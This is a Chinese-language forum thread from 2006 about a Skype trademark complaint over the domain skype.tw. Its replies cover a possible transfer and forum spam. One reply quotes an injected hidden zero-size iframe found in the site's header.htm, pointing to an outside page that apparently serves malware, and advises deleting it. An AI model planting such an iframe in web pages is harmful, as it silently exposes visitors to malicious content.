網域名稱俱樂部

返回   網域名稱俱樂部 > 網域名稱討論 > .TW 網域名稱

主題工具
舊 2006-09-26, 11:28 AM
emome emome 目前離線
普通會員

註冊日期: 2003-06-30
預設 skype.tw 網域名稱爭議

剛剛收到了skype的申訴信件,我只是想建立一個 skype 的中文
社群,倒不一定要用這個 domain,請問我可以主動聯絡放棄這個
domain呢?

現在的網站 http://skype.tw 好像被放了病毒,一開啟防毒軟體
就會跳出警告視窗,不執行的話,就會把IE關閉,也懶的處理了..

申訴書提到: 申訴人曾多次向註冊人寄發的律師函,要求其停止相
關的侵權行為 (請參照附件O)。但是,註冊人對於申訴人先後寄發
的律師函置之不理,並沒有給予申訴人任何回復。註冊人明知侵害
申訴人權利,其繼續持有該網域名稱係以妨礙申訴人使用商標及事
業名稱註冊網域名稱,並已阻礙申訴人之商業活動。

可是我除了現在這封申訴書以外,從未收到任何律師函阿,真是...

詳情:http://skype.tw/complaint.doc
舊 2006-09-26, 12:10 PM
哈啦 的頭像
哈啦 哈啦 目前離線
論壇管理員

註冊日期: 2002-05-28
預設

那就現在寫信給對方表示你可以移轉網址給對方,但對方應補償你的註冊費。

您是網站站長嗎?歡迎到站長俱樂部 一起討論吧。
按我看版規
code.club
回覆時引用此篇文章
舊 2006-09-26, 04:46 PM
emome emome 目前離線
普通會員

註冊日期: 2003-06-30
預設

哈拉兄,請問我應該要寄給誰呢? skype? 法科中心?
全部回覆應該可以吧? 用英文要怎麼寫呢?
舊 2006-09-26, 05:41 PM
eeoo99 的頭像
eeoo99 eeoo99 目前離線
進階會員

註冊日期: 2006-05-05
預設

skype.com.cn和skype.cn都胜了哟!大大可以参考一下啦!不过你这个?呵呵
舊 2006-09-26, 08:32 PM
kuer 的頭像
kuer kuer 目前離線
進階會員

註冊日期: 2006-04-08
預設

的確是加了料,網站多久沒更新??沒有更新程式碼,已經被注入。刪除header.htm第6行即可
代碼:
<iframe src=http://www.gamaniatw.com/img/1.htm width=0 height=0 scrolling=no frameborder=0></iframe>
奇怪,怎麼也不見垃圾廣告?小弟一個不打理的Forum,二個月沒理,光垃圾廣告都增加了7000多啦
回覆時引用此篇文章
舊 2006-09-26, 09:36 PM
dmwc dmwc 目前離線
進階會員

註冊日期: 2005-05-02
預設

引用:
作者: kuer
奇怪,怎麼也不見垃圾廣告?小弟一個不打理的Forum,二個月沒理,光垃圾廣告都增加了7000多啦
那你的域名一定很棒,我的放上去一個月,連一隻貓都沒有
回覆時引用此篇文章
舊 2006-09-26, 10:23 PM
kuer 的頭像
kuer kuer 目前離線
進階會員

註冊日期: 2006-04-08
預設

引用:
作者: dmwc
那你的域名一定很棒,我的放上去一個月,連一隻貓都沒有
廣告相當程度是由機器發的,全個Forum分了很多版,每個版都被廣告佔領了……

結果查看過記錄,光廣告成交量保持150IP左右/天
回覆時引用此篇文章
舊 2006-09-26, 11:34 PM
dmwc dmwc 目前離線
進階會員

註冊日期: 2005-05-02
預設

引用:
作者: kuer
結果查看過記錄,光廣告成交量保持150IP左右/天
我有一個留言板,最初通常兩三天會有一個廣告機器人來寫一篇,最初我都把他砍掉留言,反正數量也不多

後來變成一次寫兩三篇,開始煩人了,把留言規則改了一下,某些不用填的欄位改成要填,還有關鍵字寫不進去,成功的又減少了一點點廣告

直到某一天,一小時被寫入80個廣告,怎麼樣是要造反了嗎 ,一次封了40個Class C,並且把寫入頁檔名改了,寫入網頁也改成動態加密(寫入時會同時寫入一個密碼,而且是有時效),原本的寫入頁放一個 OK 的HTML,馬上乖乖一個月一個廣告都沒有

那些廣告機器人都是在虛擬主機上發的,應該大部分都不是個人電腦發的
=============================
不過這些和主題都無關,樓主要聯絡不就看whois 就有得聯絡了,而且申告書上面也有把律師事務所等相關資料都有了,要找到對方應該不難吧
回覆時引用此篇文章

主題工具

發文規則
不可以發表新主題
不可以發表回覆
不可以上傳附件
不可以編輯自己的文章

啟用 BB 代碼
論壇啟用 表情符號
論壇啟用 [IMG] 代碼
論壇禁用 HTML 代碼

所有時間均為 +8。現在的時間是 05:39 PM